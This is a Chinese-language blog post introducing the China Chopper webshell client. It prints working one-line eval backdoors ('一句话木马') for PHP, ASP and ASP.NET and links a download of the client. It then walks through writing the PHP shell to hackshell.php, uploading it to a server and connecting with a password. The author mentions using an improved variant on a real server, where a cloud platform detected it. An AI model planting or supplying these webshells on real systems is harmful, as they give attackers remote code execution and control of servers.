中国菜刀-无后门菜刀-www.maocaidao.com

菜刀是连接shell的工具,方便服务器的文件管理。今天,马会社区( mahui.org )分享的是《中国菜刀-无后门菜刀-www.maocaidao.com》。希望对大家有所帮助。

一、中国菜刀简介

中国菜刀原本是用来管理网站文件的,非常小巧灵活,仅需一段简短的代码就可以方便地管理网站。但是,目前中国菜刀已经成为了安全研究者手中必备的利器。

该软件的服务器端文件仅需包含一行代码,支持PHP、ASP、ASP.NET、JSP等,并且支持HTTPS安全连接的网站。常见代码如下:

php: <?php @eval($_POST[‘chopper’]);?>

asp:<%eval request(“chopper”)%>

asp.net:<%@ Page Language=”Jscript”%><%eval(Request.Item[“chopper”],”unsafe”);%>

上述代码中的chopper也就是密码。这些代码短小精悍,被黑客成为一句话木马,又称为一句话后门。但这些已经出现在人们视野中的一句话木马,基本都会被查杀。之前,我用改良过的一句话木马已经成功测试进入我的真实服务器,但是通过阿里云的操作平台,直接就检测出来了。

二、中国菜刀下载

中国菜刀官网已经不能访问了,那么我们从何下载呢?从GitHub上,这样大家就不用担心菜刀被人动过从而有后门之后的担忧了。下载链接如下:

https://github.com/raddyfiy/caidao-official-version/releases

中国菜刀
中国菜刀

使用方法非常简单,比如我们将下方的php代码写到hackshell.php中,然后把这个文件上传到php的服务器中,只要这个木马不被服务器软件直接删除的话,通常都可以进行中国菜刀进行连接。

<?php @eval($_POST[‘mahui’]);?>

地址为: https://mahui.org/  hackshell.php

地址后门的为密码:mahui

host为列表,PHP(Eval)为脚本类型,GB2312为编码格式。

菜刀
菜刀

以上就是马会社区( mahui.org )分享的是《中国菜刀-无后门菜刀-www.maocaidao.com》。感谢您的阅读。

mahui.org 原创文章,仅限技术研究。发布者:马会,转转请注明出处:https://mahui.org/tech/2275.html

发表评论

邮箱地址不会被公开。 必填项已用*标注